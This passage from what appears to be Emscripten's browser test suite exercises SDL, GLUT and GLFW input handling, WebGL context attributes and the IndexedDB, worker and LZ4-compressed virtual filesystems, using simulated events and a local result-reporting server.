setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
@no_wasm_backend('This modifies the JS code with regexes in a way that does not currently work in WASM2JS')
def test_glgears_proxy(self):
# we modify the asm.js, so this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
return ['-s', 'ASYNCIFY']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
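# When `delay` is set, the dispatch calls above are wrapped in setTimeout so the key
# events arrive asynchronously; the ASYNCIFY variants additionally define TEST_SLEEP,
# so the same SDL key handling is exercised both synchronously and asynchronously.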
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate sending the keypress event only when the
// prior keydown event was not preventDefault()ed.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. The keypress event should be sent, since the
// prior keydown event's default handling is not prevented.
sendKey(65);
// Send backspace. The keypress should not be sent, as default
// handling of the keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
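# Note: the synthesized events above add Module['canvas'].offsetLeft/offsetTop, i.e.
# they carry page coordinates for a point inside the canvas; test_sdl_mouse_offsets
# below omits those offsets and instead offsets the canvas itself via CSS.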
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
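# The shell above places the canvas in a container offset by 5px from the page origin,
# so together with the raw (un-offset) coordinates sent from pre.js this exercises the
# -DTEST_SDL_MOUSE_OFFSETS code path, which should account for the canvas position.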
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
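# In this Working Draft flavour of the API the spoofed buttons are plain 0/1 values;
# test_sdl_joystick_2 below repeats the test with the Editor's Draft shape, where each
# button is an object with 'pressed' and 'value' fields.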
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch the gamepadconnected event (required for the glfw joystick test; not used in the SDL tests)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the WebGL context attributes we want to test
# (request the attribute, create a context, and then read the value back from its context attributes).
# Tests will also succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
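# addRunDependency('syncfs') keeps main() from running until the IDBFS mount has been
# populated; removeRunDependency() in the syncfs callback releases it, so the C code
# only starts once the persisted state is visible in /working1.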
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
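# WORKERFS exposes the given Blob and File objects as (read-only) files under /work,
# so the C code can open 'blob.txt' and 'file.txt' and compare their contents against
# SECRET and SECRET2.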
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
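# (file1.txt and subdir/file2.txt are highly repetitive and should compress well under
# LZ4, while file3.txt is random data and should not, so the packed size is only
# expected to drop below half of the raw total.)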
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server; the client receives compressed data and can just use it. This is typical usage.
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
